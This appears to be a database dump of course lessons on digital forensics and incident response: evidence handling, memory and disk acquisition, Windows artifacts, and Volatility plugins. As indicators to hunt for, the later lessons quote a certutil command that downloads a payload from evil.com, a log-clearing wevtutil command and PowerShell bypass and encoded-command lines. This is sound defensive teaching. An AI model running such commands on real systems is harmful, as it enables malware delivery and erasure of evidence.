(1006, 793, '# Chain of Custody & Evidence Handling\n\nIf you have a smoking gun with the suspect\'s fingerprints on it, but you leave it sitting in a public hallway for 3 hours before giving it to the police, the evidence is useless in court. The defense attorney will simply say: *\"Someone else must have touched it while it was in the hallway.\"*\n\nThe exact same concept applies to digital evidence.\n\n## What is the Chain of Custody?\nThe **Chain of Custody** is a chronological, written record detailing the seizure, custody, control, transfer, analysis, and disposition of physical or digital evidence. \n\nIt answers four critical questions at any given point in time:\n1.  **Who** collected the evidence?\n2.  **How** and **where** was it collected?\n3.  **Who** had possession of it subsequently?\n4.  **How** was it stored and protected in the meantime?\n\nIf the chain is broken (unaccounted time or an undocumented transfer), the evidence may be deemed inadmissible in legal proceedings.\n\n## Hashing for Integrity\nHow do you prove that the 500GB hard drive image you took last year is exactly the same today, and that you haven\'t maliciously altered any files on it to frame someone?\n\n**Hashing.**\n\nA cryptographic hash (like MD5, SHA-1, or SHA-256) is a one-way mathematical algorithm that assigns a unique, fixed-size string of characters to a piece of data. It acts as a digital fingerprint.\n\n### The Hashing Workflow:\n1.  **Acquisition:** You arrive on scene and create a forensic image (`image.dd`) of the suspect\'s laptop.\n2.  **Initial Hash:** Immediately, you run a SHA-256 hash on `image.dd`. The result is: `5e884...a13`.\n3.  **Documentation:** You write that hash value down on your official Chain of Custody form.\n4.  **Verification:** A year later in court, the defense demands proof that the image wasn\'t tampered with. You run the SHA-256 hash again on your copy. It outputs `5e884...a13`. The fingerprints match. \n\nIf even a *single byte* in that 500GB image was changed, the resulting hash would be completely different.\n\n## Write Blockers\nWhen acquiring evidence from a physical hard drive, you must avoid altering it. Simply booting up a Windows hard drive makes hundreds of registry changes and alters file access times instantly.\n\nTo prevent this, forensics analysts use hardware or software **Write Blockers**. \nA hardware write blocker sits between the suspect\'s hard drive and your forensic workstation. It allows your computer to *read* the data from the drive to make a copy, but physically intercepts and blocks any *write* commands, preserving the original evidence perfectly pristine.', 'markdown', 5, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1007, 794, '# Core Forensics Principles\n\nTo be a successful digital investigator, you must understand two fundamental principles that guide how and when we collect evidence.\n\n---\n\n## 1. Locard\'s Exchange Principle\nDr. Edmond Locard was an early pioneer in forensic science. His principle states:\n\n> *\"Every contact leaves a trace.\"*\n\nIn the physical world, if a burglar enters a house, they might leave behind DNA, shoe prints, or fabric fibers. Conversely, they take things away with them—carpet fibers on their shoes, or a victim\'s blood on their clothes.\n\n**In the Digital World:**\nWhen an attacker breaches a server, they *always* leave a trace, and they *always* alter the environment.\n*   **What they leave:** IP addresses in Apache logs, malicious binaries dropped in `/tmp`, newly created user accounts, or modified registry keys.\n*   **What they take:** Exfiltrated database files, stolen SSH keys.\n\nThe trace is always there. The job of the forensic analyst is simply to know where to look for it before it gets overwritten.\n\n---\n\n## 2. The Order of Volatility (RFC 3227)\nYou arrive at a compromised server. It\'s powered on. Do you unplug it immediately? Do you copy the log files first? Do you dump the RAM?\n\nEvidence must be collected based on its **Volatility** — how easily and quickly it can be lost or destroyed. You must gather the most volatile evidence first, moving down to the least volatile evidence.\n\n### The Standard Order of Volatility:\n*(From Most Volatile / First Collected → to Least Volatile / Last Collected)*\n\n1.  **Registers and Cache:** Data inside the CPU. (Extremely hard to capture, often ignored in standard IR).\n2.  **Routing Tables, ARP Cache, Process Table, Kernel Statistics:** This lives in RAM mapping active network/process states. It changes every millisecond.\n3.  **System Memory (RAM):** The contents of the running memory. If power is lost, this is gone forever.\n4.  **Temporary File Systems:** E.g., The `/tmp` directory in Linux, which is often cleared upon a reboot.\n5.  **Disk (Hard Drive / SSD):** Persistent storage. Files, databases, and logs. This will survive a reboot.\n6.  **Remote Logging and Monitoring Data that is relevant to the system in question:** E.g., Logs forwarded to a SIEM.\n7.  **Physical Configuration and Network Topology:** The physical layout of cables and routers.\n8.  **Archival Media:** Backups stored on tapes or in cold cloud storage.\n\n### The \"Pull the Plug\" Debate\nIn the old days, responders were trained to \"pull the power plug\" on a compromised machine immediately to stop the attacker. \n\n**Today, pulling the plug is considered bad practice in most situations.** \nWhy? Because modern malware, like advanced ransomware or fileless trojans, often live *only* in RAM. If you pull the plug, you destroy the RAM, and you destroy the only evidence of the malware and its decryption keys. \n\nInstead, modern responders isolate the machine from the network (so the attacker loses access) and immediately image the RAM, securing the most volatile evidence first.', 'markdown', 6, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1008, 795, '# First Responder Operations\n\nWhen you are the first on the scene of a cyber incident, your actions in the first 15 minutes dictate the success or failure of the entire investigation. \n\nYou must act with the assumption that the incident will eventually end up in a legal battle, meaning every step must be defensible in court.\n\n## 1. Secure the Scene\nPhysical security comes before digital security. \n*   **Isolate the hardware:** Ensure no unauthorized personnel can walk up to the server rack or the suspect\'s laptop.\n*   **Document physical connections:** Take photographs of the computer, showing exactly what cables are plugged into what ports before you touch anything. If someone later claims a rogue USB was plugged in, you have photographic proof it wasn\'t.\n\n## 2. Triage the System State\nBefore pulling cables, you must determine what state the machine is in.\n*   **Is it powered off?** Do NOT turn it on. Booting a computer modifies thousands of files, altering timestamps and potentially triggering malware designed to destroy data upon boot.\n*   **Is it powered on?** Do NOT turn it off normally. Do NOT \"pull the plug\" right away. Leave it as is while you decide on your acquisition strategy (RAM first, then disk).\n*   **Is there a screen saver or lock screen?** Photograph what is visible. Do not attempt to guess the password, as modern systems (like BitLocker or Apple\'s secure enclave) will permanently wipe the encryption keys after too many failed attempts.\n\n## 3. Network Isolation\nYou need to stop the bleeding while preserving volatile data.\n*   **The old way:** \"Pull the network cable.\" \n*   **The modern way:** Use the switch, router, or EDR tool to logically isolate the machine. This allows you, the forensic analyst, to still remotely query the machine and pull RAM over the network, while preventing the machine from reaching the internet or the rest of the corporate network. \n*   **Warning:** If dealing with a mobile device, immediately put it in airplane mode or place it in a Faraday bag to prevent a remote wipe command from being received.\n\n## 4. The \"Live Response\" Toolkit\nIf you must interact with the live machine (e.g., to capture RAM), you cannot use the tools already installed on the machine (like the built-in Task Manager or `ps` command). Why? Because a rootkit might have replaced the built-in `ps` command to hide its own processes. \n\nInstead, first responders bring a \"Live Response Toolkit\" on a clean, trusted USB drive containing statically compiled, trusted forensic binaries.', 'markdown', 6, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1009, 796, '# Disk Acquisition & Write Blockers\n\nDisk acquisition is the process of creating an exact, bit-for-bit replica of a storage medium (Hard Drive, SSD, USB, SD Card). We never analyze the original evidence directly; we analyze the replica to preserve the original.\n\n## Logical vs. Physical Acquisition\nThere are two main types of acquisitions:\n\n### 1. Logical Acquisition\nA logical acquisition relies on the Operating System to read the files and copy them. It copies only the files the OS can see. \n*   **Pros:** Fast. Good for targeted collections (e.g., \"Just copy the user\'s Documents folder\").\n*   **Cons:** It misses deleted files, hidden partitions, and slack space. \n\n### 2. Physical (Bit-Stream) Acquisition\nA physical image reads the raw 1s and 0s directly from the physical disk hardware, ignoring the OS entirely. \n*   **Pros:** Captures absolutely everything, including deleted files, unallocated space, and hidden partitions. This is the gold standard for full investigations.\n*   **Cons:** Very slow. A 2TB drive requires a 2TB image file, even if the drive is 90% empty.\n\n## Write Blockers\nIf you plug a suspect\'s Windows hard drive into your forensic laptop just to \"take a look\", your Windows OS will aggressively mount the drive. In the background, it will update recycle bin files, change access timestamps, and create thumbnail caches. The evidence is now legally compromised.\n\nTo prevent this, we use **Write Blockers**. \nA write blocker is a device that intercepts all commands headed to the suspect drive. It allows `READ` commands to pass through but drops and blocks any `WRITE` commands.\n\n*   **Hardware Write Blockers:** Physical devices (like Tableau or WiebeTech) that you physically plug the suspect drive into. They are considered the most reliable method.\n*   **Software Write Blockers:** Software utilities or registry keys (like Linux mounting a drive as `read-only`). Less foolproof than hardware, but necessary for laptops where the SSD is soldered to the motherboard and cannot be physically removed.\n\n## Forensic Image Formats\nWhen you create the image, you don\'t just copy the files into a zip folder. You use specialized forensic formats:\n1.  **Raw (DD):** The simplest format. Just a massive file containing the exact 1s and 0s of the disk. No compression, no built-in metadata.\n2.  **EnCase (E01):** The industry standard. Combines the raw bitstream with compression, built-in hashing, and metadata (investigator name, case number) all wrapped into a single secure file.\n3.  **AFF4:** Advanced Forensic Format version 4. A newer, open-source format designed for high speed and massive datasets.', 'markdown', 7, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1010, 797, '# Memory (RAM) Acquisition\n\nMemory forensics has become the most critical component of modern Incident Response. As attackers adapt to disk forensics, they increasingly utilize \"fileless\" malware—malicious code that injects itself directly into the RAM of running processes and never touches the hard drive. \n\nIf you power off the machine before extracting the RAM, that evidence evaporates instantly.\n\n## Why RAM is the Holy Grail\nA full memory dump contains a snapshot of the exact state of the system at that moment in time. It holds:\n1.  **Running Processes:** Not just what the OS *thinks* is running, but what is *actually* executing in memory, including hidden rootkits.\n2.  **Active Network Connections:** You can see which processes are actively talking to external IP addresses (Command & Control beacons).\n3.  **Decrypted Data:** Even if the hard drive is encrypted with BitLocker, the system must hold the decryption key in RAM to function. Ram dumps routinely yield cleartext passwords, decryption keys, and private SSL keys.\n4.  **Clipboard Contents:** What the user just copied and pasted.\n5.  **Command History:** History of terminal commands recently run.\n\n## Acquisition Tools\nBecause RAM is actively being used by the operating system, you cannot use a simple copy command to grab it. You need a specialized kernel driver to access the raw memory space.\n\nCommon free tools include:\n*   **DumpIt (Windows):** A fast, simple executable. You run it from a USB drive, and it drops a `.raw` memory file onto your USB.\n*   **WinPmem (Windows/Linux/Mac):** Part of the Rekall project. Powerful, scriptable, and supports the generic `.raw` format as well as the more advanced `AFF4` format.\n*   **LiME (Linux):** Linux Memory Extractor. A Loadable Kernel Module (LKM) that creates a full memory capture of Linux devices.\n\n## The Smear Effect\nMemory is highly volatile and constantly changing. If a machine has 64GB of RAM, it might take 10 minutes to copy it all down to your USB drive. \n\nBy the time the tool finishes copying the 64th gigabyte, the data in the 1st gigabyte has completely changed since the copy started. \nThis results in a \"smear\"—the image is a patchwork of different moments in time, rather than a single frozen snapshot. Advanced memory analysis tools are designed to handle and compensate for this smear effect.\n\n## Hibernation Files and Pagefiles\nEven if a machine is powered off, you might still recover RAM data:\n*   **hiberfil.sys (Hibernation File):** When a Windows laptop is put to sleep/hibernation, the OS dumps the entire contents of RAM into this file on the hard drive to save power. Extracting this file provides a perfect, frozen memory dump from the exact moment the laptop went to sleep.\n*   **pagefile.sys / swapfile.sys:** When RAM gets full, the OS temporarily moves idle data from RAM onto the hard drive to free up space. Analyzing these files can reveal historical artifacts that were once in memory.', 'markdown', 6, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1011, 798, '# Network Evidence Acquisition\n\nIn many incidents, the only trace of the attacker is the traffic they generated communicating with their Command and Control (C2) servers or exfiltrating data. It is often said that while logs can be deleted and files can be wiped, \"packets don\'t lie.\"\n\n## Full Packet Capture (PCAP)\nThe ultimate form of network evidence is a Full Packet Capture. This records every single bit of data traversing the wire—the headers, the routing information, and the actual payload (the contents of the emails, the files being downloaded, the web pages viewed).\n\n*   **Tools:** Wireshark, `tcpdump`.\n*   **The Problem:** Storing full PCAPs is incredibly expensive. A busy corporate firewall might process 10 Terabytes of data per day. Retaining full PCAPs for 30 days requires massive, specialized storage clusters (like Arkime/Moloch). Because of this, most organizations do not save full PCAPs.\n\n## NetFlow (Network Telemetry)\nIf you can\'t record the entire phone call (PCAP), the next best thing is to record the phone bill (NetFlow). \n\nNetFlow is metadata about network traffic. It records:\n*   Source IP & Destination IP\n*   Source Port & Destination Port\n*   Protocol (TCP/UDP)\n*   Total Bytes Transferred\n*   Start time & End time\n\nNetFlow does **not** record the payload. It cannot tell you *what* was inside the HTTP request, only that an HTTP request occurred and transferred 40MB of data.\n*   **Pros:** Requires 99% less storage than full PCAPs. You can store months of NetFlow data easily.\n*   **Usage in DFIR:** If an analyst sees a NetFlow record indicating 50 Gigabytes of data was sent from the internal Database Server to an unknown IP in Russia at 3:00 AM, they don\'t need the PCAP to know data exfiltration just occurred.\n\n## Log Files\nWhen PCAP and NetFlow are unavailable, analysts rely heavily on network appliance logs:\n*   **Firewall Logs:** Shows allowed and blocked connections.\n*   **Proxy Logs / Web Gateways:** Shows the exact URLs internal users visited, the user-agent strings, and HTTP status codes. This is critical for catching users clicking phishing links.\n*   **DNS Logs:** Attackers frequently use DNS to locate internal assets or even to exfiltrate data (DNS Tunneling). Analyzing DNS queries is a staple of network forensics.\n\n## Collecting Evidence on the Wire\nHow do we actually capture the traffic without interrupting the network?\n1.  **Port Mirroring (SPAN Port):** You configure the corporate network switch to take a copy of every packet passing through it and send that copy to a dedicated monitor port, where your forensic capture tool is plugged in.\n2.  **Network Taps:** A physical hardware device inserted directly inline with the network cable. It acts like a splitter, passively duplicating the optical or electrical signal to a capture device. Taps are completely invisible to the network and are more reliable than SPAN ports under heavy load.', 'markdown', 5, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1012, 799, '# The Windows Registry\n\nThe Windows Registry is the central hierarchical database used to store information necessary to configure the system for one or more users, applications, and hardware devices. For forensics analysts, it is an absolute goldmine.\n\nWhenever a user executes a program, plugs in a USB drive, or changes a setting, a trace is left in the Registry.\n\n## Structure of the Registry\nThe registry is divided into five main logical root keys (Hives):\n1.  **HKEY_LOCAL_MACHINE (HKLM):** Settings applied to the entire machine, regardless of who is logged in.\n2.  **HKEY_CURRENT_USER (HKCU):** Settings unique to the currently logged-in user.\n3.  **HKEY_USERS (HKU):** Contains all the loaded user profiles. (HKCU is actually just a pointer into a specific subkey inside HKU).\n4.  **HKEY_CLASSES_ROOT (HKCR):** File extension associations (e.g., telling Windows that `.txt` opens with Notepad).\n5.  **HKEY_CURRENT_CONFIG (HKCC):** Information about the hardware profile currently being used.\n\n## Where are the files?\nWhen you image a hard drive, you don\'t get a file called `registry.exe`. The registry is actually made up of several physical files called **Hives** located on the disk:\n*   `C:\\Windows\\System32\\config\\SYSTEM` (Maps to HKLM\\SYSTEM)\n*   `C:\\Windows\\System32\\config\\SOFTWARE` (Maps to HKLM\\SOFTWARE)\n*   `C:\\Windows\\System32\\config\\SECURITY` (Maps to HKLM\\SECURITY)\n*   `C:\\Windows\\System32\\config\\SAM` (Security Account Manager - Holds local password hashes)\n*   `C:\\Users\\<username>\\NTUSER.DAT` (Maps to the specific user\'s HKCU)\n\n## Key Forensic Artifacts in the Registry\n\n### 1. Persistence (Auto-Start Extensibility Points)\nAttackers want their malware to survive a reboot. The easiest way to do this is to add a registry key telling Windows to run the malware every time it starts.\n*   **Run Keys:** `HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run` and `HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`\n*   *Forensic Value:* Always check these keys. If you see `C:\\Users\\Public\\svchost.exe` launching from a Run key, the machine is compromised.\n\n### 2. USB Device History (USBStor)\nDid the suspected employee copy the secret blueprints to a thumb drive? \n*   **Location:** `HKLM\\SYSTEM\\CurrentControlSet\\Enum\\USBSTOR`\n*   *Forensic Value:* Records the Vendor, Product ID, and unique Serial Number of *every* USB mass storage device that has ever been plugged into the machine.\n\n### 3. UserAssist\n*   **Location:** `HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist`\n*   *Forensic Value:* Tracks which GUI applications the user executed, how many times they ran them, and the last time they were executed. The names of the programs are lightly obfuscated using ROT-13 encryption, which your forensic tools will decrypt automatically.', 'markdown', 7, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1013, 800, '# Windows Event Logs\n\nWindows Event Logs (`.evtx` files) are the primary source of chronological historical data on a Windows system. They track logins, service starts, application crashes, and security policy changes.\n\nThey are stored in `C:\\Windows\\System32\\winevt\\Logs\\`.\n\n## The Big Three\nWhile modern Windows has hundreds of event log files, the core three are:\n1.  **System:** Events logged by Windows system components (e.g., a driver failing to load, or the system booting up).\n2.  **Application:** Events logged by installed software (e.g., Microsoft Word crashing, or an antivirus detecting a file).\n3.  **Security:** Events related to authentication, privilege use, and object access. *By default, only Administrators can view this log.*\n\n## Crucial Security Event IDs (EIDs)\nAs a DFIR analyst, you must memorize these specific Event IDs. They are the bread and butter of finding attackers.\n\n### Logon & Authentication\n*   **EID 4624:** Successful Logon. \n    *   *Forensic Value:* Shows *who* logged in, *when*, and from *where* (Source IP). The \"Logon Type\" field is critical. Type 2 means Interactive (Physical keyboard). Type 3 means Network (e.g., accessing a shared folder). Type 10 means Remote Interactive (RDP).\n*   **EID 4625:** Failed Logon.\n    *   *Forensic Value:* A high volume of 4625s in a short time frame indicates a Brute Force or Password Spraying attack.\n*   **EID 4672:** Special Privileges Assigned to New Logon.\n    *   *Forensic Value:* This means the user logged in as an Administrator (or used \"Run as Administrator\").\n\n### Account Management\n*   **EID 4720:** A user account was created.\n    *   *Forensic Value:* Attackers often create backup \"backdoor\" accounts (like `SysAdmin1`) just in case their malware is discovered and removed. \n*   **EID 4722 / 4724:** Account enabled / Password reset.\n*   **EID 4732:** A member was added to a security-enabled local group.\n    *   *Forensic Value:* Look closely if the target group is \"Administrators\". This is a sign of local privilege escalation.\n\n### Process Execution\nBy default, Windows does not log every program that runs. However, if Advanced Audit Policy is enabled, you get:\n*   **EID 4688:** A new process has been created.\n    *   *Forensic Value:* Tells you exactly what time a program ran. If command-line auditing is turned on, it will even log the exact arguments (e.g., `powershell.exe -NoProfile -EncodedCommand JABX...`), which is incredibly useful for catching malicious scripts.\n\n## Clearing Logs\n*   **EID 1102:** The audit log was cleared.\n    *   *Forensic Value:* The massive red flag. Attackers often run the command `wevtutil cl Security` to erase their tracks. If you see EID 1102, assume an attacker was present, had Administrator rights, and intentionally deleted evidence.', 'markdown', 8, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1014, 801, '# Evidence of Execution\n\nOne of the most common questions an analyst must answer is: *\"Did the malware actually run?\"* \n\nJust because a malicious file exists on the hard drive does not mean the user actually double-clicked it. To prove execution, we look at several specific Windows artifacts.\n\n## 1. Prefetch (*.pf files)\nWindows uses Prefetch to speed up the boot process and application launch times. When an application runs for the first time, Windows analyzes what files and DLLs it needs and creates a `.pf` file in `C:\\Windows\\Prefetch\\`. \n\nThe next time the application runs, Windows reads the `.pf` file and pre-loads the necessary components into memory, making the application launch faster.\n\n*   **Forensic Value:** \n    *   **Proof of execution:** If `nc.exe-0D12ABCD.pf` exists, Netcat was absolutely executed on this machine.\n    *   **Execution count:** The file stores exactly how many times the application has been run.\n    *   **Timestamps:** It stores the timestamp of the last execution, as well as up to 7 previous execution timestamps (in Windows 8+).\n    *   **Target path:** It shows exactly where the executable was located when it ran (e.g., was it run from `C:\\Temp` or from a USB drive?).\n\n## 2. Shimcache (Application Compatibility Cache)\nWhenever an application runs, Windows checks if it needs any special compatibility settings (shims) to run properly (e.g., \"Does this program think it\'s running on Windows XP?\").\n\nWindows caches these checks in the Registry at `HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\AppCompatCache`.\n\n*   **Forensic Value:** \n    *   The Shimcache tracks the file path, the file size, and the Last Modified time of the executable.\n    *   It is fantastic for tracking executables that were run from a USB drive and subsequently deleted. Even if the USB is removed, the trace remains in the Shimcache.\n    *   *Note:* The Shimcache does not definitively prove execution (a file can enter the cache just by being browsed in Explorer), but it proves the file existed on the system at a specific path.\n\n## 3. Amcache\nA newer artifact (Windows 8+) located at `C:\\Windows\\AppCompat\\Programs\\Amcache.hve`. It is technically its own registry hive file.\n\n*   **Forensic Value:**\n    *   Similar to Shimcache but records much more detail, notably the **SHA-1 hash** of the executable. \n    *   This is incredibly powerful. Even if an attacker renames their malware from `mimikatz.exe` to `svchost.exe`, the Amcache will record its true SHA-1 hash, allowing analysts to instantly identify the malicious binary.', 'markdown', 6, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1015, 802, '# File System Artifacts\n\nBeyond the registry and logs, the NTFS file system itself leaves dozens of clues about user behavior and file manipulation.\n\n## Master File Table (MFT)\nNTFS uses a database called the Master File Table (MFT) to track every single file and folder on the volume. The file itself is called `$MFT`. \n\n*   **MACB Timestamps:** The MFT records four critical timestamps for every file:\n    *   **M**odified: When the file contents were last changed.\n    *   **A**ccessed: When the file was last opened/read.\n    *   **C**reated: When the file was first created on this volume.\n    *   **MFT Modified (B for birthed/metadata):** When the file\'s metadata (permissions, name) was last changed.\n*   **Time Stomping:** Advanced attackers use anti-forensic tools to alter MAC timestamps to make malicious files blend in (e.g., changing malware creation date to 2018). However, it is very difficult to successfully forge the \'MFT Modified\' timestamp, meaning forensic tools can often detect time stomping.\n\n## Windows Shortcut Files (.lnk)\nWhen a user opens a file, Windows often automatically creates a shortcut (`.lnk`) file pointing to it (e.g., in the \"Recent Items\" folder). \n\n*   **Forensic Value:** LNK files are gold. They contain metadata about the target file *and* the system it was on. Even if the target file was on a USB drive that is now gone, the LNK file left behind tells us:\n    1.  The original path of the file.\n    2.  The MAC timestamps of the target file.\n    3.  The Volume Serial Number of the USB drive it was on.\n    4.  The MAC address of the machine where the file was originally created.\n\n## The Recycle Bin\nWhen a user \"deletes\" a file, Windows doesn\'t actually erase the 1s and 0s. Firstly, it just moves the file to a hidden system folder called `$Recycle.Bin`. \n\nInside the Recycle Bin, Windows splits the deleted file into two pieces:\n1.  **$R file:** The actual contents of the deleted file, renamed with a random string ($R123456.docx).\n2.  **$I file:** A metadata file containing the *original name* of the file, its *original path* before it was deleted, and the exact *timestamp* it was deleted.\n\nIf you find a suspicious file in the Recycle Bin, parsing its corresponding `$I` file tells you exactly where it came from and when the suspect tried to get rid of it.', 'markdown', 5, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1016, 803, '# Introduction to Volatility\n\nVolatility is the world\'s most widely used, open-source memory forensics framework. Written in Python, it allows investigators to analyze RAM captures (.raw, .vmem, .dmp) offline to reconstruct the exact state of a computer at the moment the memory was captured.\n\n## Volatility 2 vs Volatility 3\nThere are two main versions of Volatility currently in use:\n*   **Volatility 2:** The traditional version (Python 2). It requires the analyst to manually specify a **\"Profile\"** (the exact OS version, e.g., `Win7SP1x64`) before it can parse the memory image. If you guess the wrong profile, Volatility returns gibberish.\n*   **Volatility 3:** The modern version (Python 3). It largely eliminates the need for manual profiles. Instead, it downloads \"Symbol Tables\" from Microsoft on the fly to automatically figure out the OS version and parse the structures.\n\nEverything in this module focuses on Volatility 3, as it is the current industry standard.\n\n## Basic Syntax (Volatility 3)\nThe syntax for Volatility 3 is straight-forward: you run the `vol.py` script, provide the target memory image using `-f`, and then specify a **plugin**.\n\nA plugin is a specific script that looks for a specific artifact in memory.\n\n**Syntax:** \n`python3 vol.py -f <memory_image> <plugin_name>`\n\n**Example:**\n`python3 vol.py -f infected_laptop.raw windows.info`\n\n## The \'windows.info\' Plugin\nThe absolute first plugin you should run on any new memory image is `windows.info`.\n\n*   **What it does:** It analyzes the basic header structures of the memory image to determine the exact Operating System version, the primary architecture (32-bit vs 64-bit), the exact build number, and the time the memory image was created.\n*   **Forensic Value:** It proves the memory image is sound and readable, and gives you the exact timestamp of the acquisition, which is perfectly aligned toUTC time (unlike disk timestamps which might be affected by local timezones).', 'markdown', 6, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1017, 804, '# Process Enumeration\n\nThe most fundamental task in memory forensics is identifying what programs were running when the RAM was captured.\n\n## windows.pslist (The Honest List)\nTo understand what is running, the Windows Kernel maintains a linked list called the **EPROCESS block list** (specifically the `ActiveProcessLinks`). Whenever you open Task Manager, Windows simply walks down this list and displays the results.\n\nThe `windows.pslist` plugin does exactly the same thing. It asks the OS, \"What processes do you think are running?\"\n\n*   **Syntax:** `python3 vol.py -f image.raw windows.pslist`\n*   **Output:** Process Name, Process ID (PID), Parent Process ID (PPID), Threads, Handles, and Creation Time.\n\n**The Problem:** Because `pslist` relies on the linked list maintained by the OS, it is highly susceptible to **Rootkits**. A rootkit can simply digitally unlink its malicious process from the `ActiveProcessLinks` list. To the OS (and Task Manager, and `pslist`), the malware suddenly becomes invisible, even though it is still actively executing in memory.\n\n## windows.psscan (The Skeptical Scanner)\nTo find hidden processes, we use **Memory Carving**. \n\nInstead of trusting the linked list, `windows.psscan` ignores the OS entirely. It methodically scans every single byte of the massive RAM file, looking for the specific byte-signature that signifies the start of an `EPROCESS` data structure.\n\n*   **Syntax:** `python3 vol.py -f image.raw windows.psscan`\n*   **The Power of Carving:** If a rootkit unlinks itself to hide, `psscan` will still find it, because the actual data structure must still exist in RAM for the malware to run.\n*   **Bonus Power:** Because it scans memory raw, `psscan` can even find processes that were recently terminated (closed) but whose data hasn\'t yet been overwritten by new data.\n\n## The Comparison Technique\nHow do you find the hidden rootkit?\nYou run `pslist`. You run `psscan`. Then you compare the outputs. \nIf a process shows up in `psscan` but is absent from `pslist`, you have found a process that was deliberately unlinked and hidden. That PID is almost certainly malicious.\n\n## windows.pstree (The Family Tree)\nAttackers often name their malware something innocent, like `svchost.exe`. How do you spot the fake?\n\n`windows.pstree` organizes processes by their Parent-Child relationships. \n*   *Normal:* `services.exe` spawns a dozen `svchost.exe` processes.\n*   *Malicious:* You see `explorer.exe` (the desktop GUI) spawning a `svchost.exe`. Or a `winword.exe` (Microsoft Word) spawning `cmd.exe` or `powershell.exe`. The parent-child relationship instantly gives away the attacker.', 'markdown', 7, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1018, 805, '# Network and Command Line Analysis in RAM\n\nAnalyzing processes is only half the battle. We also need to see what the processes were doing—who they were talking to, and how they were launched.\n\n## windows.netscan\nJust because malware is hidden doesn\'t mean it operates in a vacuum. It must communicate with the attacker\'s Command and Control (C2) server. \n\nThe `windows.netscan` plugin scans RAM for network artifact structures (similar to how `psscan` looks for processes). \n\n*   **Syntax:** `python3 vol.py -f image.raw windows.netscan`\n*   **Output:** \n    *   **Protocol:** TCP/UDP\n    *   **Local Address & Port**\n    *   **Foreign Address & Port:** The external IP the machine is talking to.\n    *   **State:** ESTABLISHED, LISTENING, CLOSED, etc.\n    *   **Owner (PID):** The Process ID responsible for the connection.\n*   **Forensic Value:** If you see an unknown IP address communicating over port 443 (HTTPS), you can check the \"Owner PID\". You might discover that a seemingly innocent `notepad.exe` is actively holding open an encrypted tunnel to Russia. That is an immediate indicator of compromise.\n\n## windows.cmdline\nWindows allows you to launch programs with specific arguments (e.g., instead of just double-clicking a script, an attacker runs `powershell.exe -ExecutionPolicy Bypass -File evil.ps1`).\n\nThese arguments might be the only place the attacker\'s true intent is visible. Even if the process completes and terminates, the command-line arguments often linger in memory.\n\n*   **Syntax:** `python3 vol.py -f image.raw windows.cmdline`\n*   **Forensic Value:** This plugin prints out the exact command-line string used to launch every process found in memory.\n*   **What to look for:**\n    *   **Encoded Commands:** `powershell.exe -e JABjAGwAaQBlAG4AdAAgAD0...` (Base64 encoded commands are a massive red flag).\n    *   **Suspicious Paths:** `cmd.exe /c start C:\\Users\\Public\\malware.exe`\n    *   **Living off the Land:** Using legitimate Windows tools for malicious purposes (e.g., `certutil.exe -urlcache -split -f http://evil.com/payload.exe`).', 'markdown', 5, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
(1019, 806, '# Hunting Advanced Malware (Malfind)\n\nIf an attacker is somewhat sophisticated, they won\'t even leave an `evil.exe` running on the system. Instead, they will use **Code Injection**. \n\nThey will take malicious payload code and inject it directly into the memory space of a completely legitimate process, like the real, Microsoft-signed `explorer.exe` (the taskbar). \nIf you check `pslist`, `explorer.exe` looks fine. If you check `netscan`, `explorer.exe` is talking to the internet (which is suspicious, but not definitive proof).\n\nHow do you prove the legitimate process is \"infected\"?\n\n## Memory Protections (VAD - Virtual Address Descriptor)\nTo understand injection, you must understand how Windows protects memory. Windows assigns permissions to blocks of memory using a structure called the Virtual Address Descriptor (VAD).\n*   **PAGE_READONLY:** The program can read this memory, but not change it.\n*   **PAGE_READWRITE (RW):** The program can store variables and data here.\n*   **PAGE_EXECUTE_READ (RX):** The memory contains actual CPU instructions (code) that are allowed to run.\n\n**The Golden Rule:** Data should be `RW`. Code should be `RX`.\nIt is a massive security risk to allow memory to be both writable AND executable at the same time: **PAGE_EXECUTE_READWRITE (RWX)**.\nIf a block of memory is `RWX`, an attacker can write malicious code into it, and then instantly execute it. Modern Windows compiles very few programs with `RWX` permissions.\n\n## windows.malfind\nThe `windows.malfind` plugin is the ultimate malware hunter. \n\nIt ignores the names of processes. It ignores parent-child relationships. Instead, it scans the Virtual Address Descriptor (VAD) of every single process, looking for memory regions marked as **PAGE_EXECUTE_READWRITE (RWX)**.\n\nIf it finds an `RWX` section, it then checks if there is an unbacked executable (a program in memory that does not correspond to a physical file on the hard drive).\n\n*   **Syntax:** `python3 vol.py -f image.raw windows.malfind`\n*   **Output:** For every hit, it prints the Process Name, the PID, the starting memory address of the injected code, and a hex dump of the first few bytes of that injected code.\n*   **What to look for in the Hex Dump:** \n    *   `4D 5A` (MZ) - These are the magic bytes that signify a Windows Executable (PE file).\n    *   If you see a legitimate process like `svchost.exe`, and `malfind` highlights a memory region marked `RWX` that starts with `4D 5A`, you have found a reverse shell or beacon fully injected into that process.\n\n## Extracting the Malware\nOnce `malfind` or `pslist` identifies a malicious PID, you can extract the malware out of the RAM image and save it to your forensic workstation for reverse engineering.\n\n*   **windows.pslist --pid <PID> --dump:** Dumps the entire executable of a running process.\n*   **windows.malfind --pid <PID> --dump:** Dumps specifically the hidden, injected code sections identified by the malfind plugin.', 'markdown', 7, '2026-03-09 22:28:54', '2026-03-09 22:28:54'),
